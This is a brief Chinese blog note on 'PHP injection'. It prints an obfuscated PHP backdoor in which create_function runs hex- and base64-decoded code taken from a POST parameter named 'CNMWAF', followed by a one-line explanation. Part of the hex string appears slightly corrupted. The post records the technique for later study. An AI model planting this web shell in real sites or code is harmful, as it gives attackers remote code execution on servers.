首页 » PHP » 正文

PHP注入

从别处看到PHP注入的方式,尚不完全清楚,只做记录,有时间再来研究。

$Content=Create_Function("", PACK("H*", "72657475726e207472696d2862969e32686578286261736536345f6465636f64652840245f504f53545b22434e4d574146225d2929293b"));
$ContentS = $Content();
if ($ContentS) {
    $text = PACK("H*", $ContentS);
    $St = Create_Function("", $text);
    $St();
    exit();
}

看样子,主要是利用了create_function方法,传入特定的字符串后,将字符串当做程序直接运行。

php注入.png

发表评论